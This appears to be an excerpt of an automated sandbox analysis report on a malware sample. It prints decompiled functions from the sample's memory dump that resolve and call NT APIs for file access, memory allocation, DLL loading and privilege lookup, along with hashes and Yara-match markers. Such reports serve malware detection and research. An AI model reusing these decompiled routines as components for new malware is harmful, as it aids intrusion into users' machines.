                                                                                      				_t6 =  &_a32; // 0x413d42
                                                                                      				_t12 =  &_a8; // 0x413d42
                                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                      				return _t18;
                                                                                      			}







                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID: B=A$B=A
                                                                                      • API String ID: 2738559852-2767357659
                                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                      • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                      • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00409B10(void* __eax, void* _a4, void* _a8) {
                                                                                      				void* _v5;
                                                                                      				char* _v8;
                                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                                      				char _v536;
                                                                                      				void* _t17;
                                                                                      				struct _OBJDIR_INFORMATION _t19;
                                                                                      				struct _OBJDIR_INFORMATION _t20;
                                                                                      				void* _t33;
                                                                                      				void* _t34;
                                                                                      				void* _t35;
                                                                                      
                                                                                      				_push(0x104);
                                                                                      				_push( &_v12);
                                                                                      				_v8 =  &_v536;
                                                                                      				_t17 = E0041AB40();
                                                                                      				_t34 = _t33 + 0xc;
                                                                                      				if(_t17 != 0) {
                                                                                      					_t19 = E0041AF60(__eflags, _v8);
                                                                                      					_t35 = _t34 + 4;
                                                                                      					__eflags = _t19;
                                                                                      					if(_t19 != 0) {
                                                                                      						E0041B1E0( &_v12, 0);
                                                                                      						_t35 = _t35 + 8;
                                                                                      					}
                                                                                      					_t20 = E004192F0(_v8);
                                                                                      					_v16 = _t20;
                                                                                      					__eflags = _t20;
                                                                                      					if(_t20 == 0) {
                                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                      						return _v16;
                                                                                      					}
                                                                                      					return _t20;
                                                                                      				} else {
                                                                                      					return _t17;
                                                                                      				}
                                                                                      			}















                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                      • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                      • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                      				long _t21;
                                                                                      				void* _t31;
                                                                                      
                                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                                      				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                      				return _t21;
                                                                                      			}






                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                      • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                      • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E004181AA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                      				long _t21;
                                                                                      				void* _t31;
                                                                                      
                                                                                      				asm("adc dword [ebp-0x2cfe3a4f], 0x8bec8b55");
                                                                                      				_t15 = _a4;
                                                                                      				_t3 = _t15 + 0xc40; // 0xc40
                                                                                      				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                      				return _t21;
                                                                                      			}






                                                                                      APIs
                                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 37ea7cbf187f3bbdd21c094d75af695bce8c97b7fed3748cd55249d84c62ff81
                                                                                      • Instruction ID: ab9cb67d32c706cefc1ce9ce5efed8057405b4578743ffddfbe15f69fd5cd0a1
                                                                                      • Opcode Fuzzy Hash: 37ea7cbf187f3bbdd21c094d75af695bce8c97b7fed3748cd55249d84c62ff81
                                                                                      • Instruction Fuzzy Hash: 24F0C4B2214149ABCB48CF98D884CEB77A9FF8C754B15864DFA1DA3202D634E8558BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                      				long _t14;
                                                                                      				void* _t21;
                                                                                      
                                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                                      				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                      				return _t14;
                                                                                      			}






                                                                                      APIs
                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2167126740-0
                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                      • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                      • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E004182E0(intOrPtr _a4, void* _a8) {
                                                                                      				long _t8;
                                                                                      				void* _t11;
                                                                                      
                                                                                      				asm("in al, dx");
                                                                                      				_t5 = _a4;
                                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                                      				_t3 = _t5 + 0xc50; // 0x409733
                                                                                      				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                      				_t8 = NtClose(_a8); // executed
                                                                                      				return _t8;
                                                                                      			}






                                                                                      APIs
                                                                                      • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                      • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                      • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E004182E2() {
                                                                                      				long _t8;
                                                                                      				void* _t11;
                                                                                      				void* _t15;
                                                                                      
                                                                                      				asm("in al, dx");
                                                                                      				_t5 =  *((intOrPtr*)(_t15 + 8));
                                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                                      				_t3 = _t5 + 0xc50; // 0x409733
                                                                                      				E00418DB0(_t11,  *((intOrPtr*)(_t15 + 8)), _t3,  *_t2, 0, 0x2c);
                                                                                      				_t8 = NtClose( *(_t15 + 0xc)); // executed
                                                                                      				return _t8;
                                                                                      			}







                                                                                      APIs
                                                                                      • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID:
                                                                                      • API String ID: 3535843008-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                      				char _v67;
                                                                                      				char _v68;
                                                                                      				void* _t12;
                                                                                      				intOrPtr* _t13;
                                                                                      				int _t14;
                                                                                      				long _t21;
                                                                                      				intOrPtr* _t25;
                                                                                      				void* _t26;
                                                                                      
                                                                                      				_v68 = 0;
                                                                                      				E00419D10( &_v67, 0, 0x3f);
                                                                                      				_t12 = E00409B10(E0041A8F0( &_v68, 3), _a4 + 0x1c,  &_v68); // executed
                                                                                      				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                      				_t25 = _t13;
                                                                                      				if(_t25 != 0) {
                                                                                      					_t21 = _a8;
                                                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                      					_t32 = _t14;
                                                                                      					if(_t14 != 0) {
                                                                                      						L4:
                                                                                      						return _t14;
                                                                                      					}
                                                                                      					_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return _t13;
                                                                                      				}

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID:
                                                                                      • API String ID: 1836367815-0
                                                                                      • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                      • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                      • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                      • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 58%
                                                                                      			E004184B2(void* __eax, signed int __ebx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                      				char _t15;
                                                                                      				void* _t24;
                                                                                      				intOrPtr _t31;
                                                                                      
                                                                                      				 *((intOrPtr*)(__ebx + 0x1931e381 + __ebx * 2)) = _t31;
                                                                                      				asm("sbb ebx, ecx");
                                                                                      				asm("fcom dword [ebp-0x75]");
                                                                                      				_push(_t28);
                                                                                      				_t12 = _a4;
                                                                                      				_t7 = _t12 + 0xc74; // 0xc74
                                                                                      				E00418DB0(_t24, _a4, _t7,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                      				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                      				return _t15;
                                                                                      			}

                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 4bcfcab0996b3a49f899ab8711ade84d36059e62ded83e08f960cf8745a4830d
                                                                                      • Instruction ID: f9e678ea5ea72d66287593605fa0b376b38db40d5ea69da659ff0b855a7e20e7
                                                                                      • Opcode Fuzzy Hash: 4bcfcab0996b3a49f899ab8711ade84d36059e62ded83e08f960cf8745a4830d
                                                                                      • Instruction Fuzzy Hash: 5DF030716003046FDB24DFA5DC85EE73768EF84350F104659F9099B291C632E814CAA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 43%
                                                                                      			E004185C5(intOrPtr __edx, void* __eflags, intOrPtr _a3, intOrPtr _a7, intOrPtr _a11, WCHAR* _a12, intOrPtr _a15, WCHAR* _a16, intOrPtr _a19, struct _LUID* _a20, intOrPtr _a23, intOrPtr _a27) {
                                                                                      				intOrPtr* _t17;
                                                                                      				int _t20;
                                                                                      				void* _t27;
                                                                                      				void* _t39;
                                                                                      				void* _t40;
                                                                                      				intOrPtr* _t43;
                                                                                      				void* _t45;
                                                                                      
                                                                                      				asm("int 0x4d");
                                                                                      				if(__eflags < 0) {
                                                                                      					asm("sbb [edx], cl");
                                                                                      					 *_t17 =  *_t17 + _t17;
                                                                                      					__eflags =  *_t17;
                                                                                      					_push(_t40);
                                                                                      					E00418DB0(_t39, _t17, _t17 + 0xc8c, _t27, 0, 0x46);
                                                                                      					_t20 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                                                                                      					return _t20;
                                                                                      				} else {
                                                                                      					 *((intOrPtr*)(__edx + 0x104)) = __edx;
                                                                                      					_t21 = _a3;
                                                                                      					_t6 = _t21 + 0xc88; // 0xd8c
                                                                                      					_t43 = _t6;
                                                                                      					E00418DB0(_t39, _a3, _t43,  *((intOrPtr*)(_a3 + 0xa14)), 0, 0x39);
                                                                                      					return  *((intOrPtr*)( *_t43))(_a7, _a11, _a15, _a19, _a23, _a27, _t40, _t45);
                                                                                      				}
                                                                                      			}

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: 523f04cf20efcbd1058fc3a850bd682b4f999cab60ab9b5f267057c9cb8b6952
                                                                                      • Instruction ID: f0b9f8bfa91d960491807779a90083a4481057f790e0b16a3b5f2a921d8b85dd
                                                                                      • Opcode Fuzzy Hash: 523f04cf20efcbd1058fc3a850bd682b4f999cab60ab9b5f267057c9cb8b6952
                                                                                      • Instruction Fuzzy Hash: 57E09AB16452506BCB21DF299C45ED73B28AF83210F04808AFA885B282C834A824C7F8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                      				char _t10;
                                                                                      				void* _t15;
                                                                                      
                                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                                      				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                      				return _t10;
                                                                                      			}

                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                      • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                      • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                      				void* _t10;
                                                                                      				void* _t15;
                                                                                      
                                                                                      				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                      				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                      				return _t10;
                                                                                      			}

                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                      • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                      • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E0041861C(void* __eax, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                      				intOrPtr* _t8;
                                                                                      				int _t11;
                                                                                      				intOrPtr _t12;
                                                                                      				void* _t16;
                                                                                      
                                                                                      				_t8 = _a4;
                                                                                      				_t12 =  *((intOrPtr*)(_t8 + 0xa18));
                                                                                      				asm("sbb [edx], cl");
                                                                                      				 *_t8 =  *_t8 + _t8;
                                                                                      				E00418DB0(_t16, _t8, _t8 + 0xc8c, _t12, 0, 0x46);
                                                                                      				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                      				return _t11;
                                                                                      			}

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: 0c710dff49ace5dd85d7782df860aea3053557ab59e4557cb382e6ef21c7c041
                                                                                      • Instruction ID: 365271f8af807b489c65f00fbc01140156c73c489d695ccda8bbc4973ecadc89
                                                                                      • Opcode Fuzzy Hash: 0c710dff49ace5dd85d7782df860aea3053557ab59e4557cb382e6ef21c7c041
                                                                                      • Instruction Fuzzy Hash: 41E01AB16002186BDB10DF85DC85EEB37A9AF89650F118559FA09AB241CA34E9108BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E00418620(intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                      				intOrPtr* _t7;
                                                                                      				int _t10;
                                                                                      				intOrPtr _t11;
                                                                                      				void* _t15;
                                                                                      
                                                                                      				_t7 = _a4;
                                                                                      				_t11 =  *((intOrPtr*)(_t7 + 0xa18));
                                                                                      				asm("sbb [edx], cl");
                                                                                      				 *_t7 =  *_t7 + _t7;
                                                                                      				E00418DB0(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
                                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                      				return _t10;
                                                                                      			}

                                                                                      APIs
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LookupPrivilegeValue
                                                                                      • String ID:
                                                                                      • API String ID: 3899507212-0
                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                      • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                      • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 50%
                                                                                      			E004184F3(intOrPtr _a4, int _a8) {
                                                                                      				void* _t23;
                                                                                      
                                                                                      				asm("cmc");
                                                                                      				asm("out 0x66, eax");
                                                                                      				_t11 = _a4;
                                                                                      				E00418DB0(_t23, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t11 + 0xa14)), 0, 0x36);
                                                                                      				ExitProcess(_a8);
                                                                                      			}





                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: f568f8f9198ae40d9e1187bb6f8462a45598cc8a6b4c3904ba6faafd6a9ceca2
                                                                                      • Instruction ID: 19fa9fc9d31237ab9c762a526bad3dd699b139ec7d7001aa30dae1af17590834
                                                                                      • Opcode Fuzzy Hash: f568f8f9198ae40d9e1187bb6f8462a45598cc8a6b4c3904ba6faafd6a9ceca2
                                                                                      • Instruction Fuzzy Hash: 78E0C2B8A452412ACF119B348CD5EC33FA4DF85305F1449AEAD9AAB243C974E606C6A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00418500(intOrPtr _a4, int _a8) {
                                                                                      				void* _t10;
                                                                                      
                                                                                      				_t5 = _a4;
                                                                                      				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                      				ExitProcess(_a8);
                                                                                      			}




                                                                                      0x00418503
                                                                                      0x0041851a
                                                                                      0x00418528

                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                      • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                      • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
                                                                                      • Instruction ID: 9e7ee52535696e215f35feeadd9b116418b19e0bdb4a0ebcabc2c320c5a070e4
                                                                                      • Opcode Fuzzy Hash: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
                                                                                      • Instruction Fuzzy Hash: 99B02B718010C4C5D602D3E00A08717BA007BC0300F12C011E3020350B8378C080F1B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Strings
                                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0186B484
                                                                                      • a NULL pointer, xrefs: 0186B4E0
                                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B3D6
                                                                                      • write to, xrefs: 0186B4A6
                                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0186B2DC
                                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0186B476
                                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0186B352
                                                                                      • *** enter .exr %p for the exception record, xrefs: 0186B4F1
                                                                                      • The instruction at %p referenced memory at %p., xrefs: 0186B432
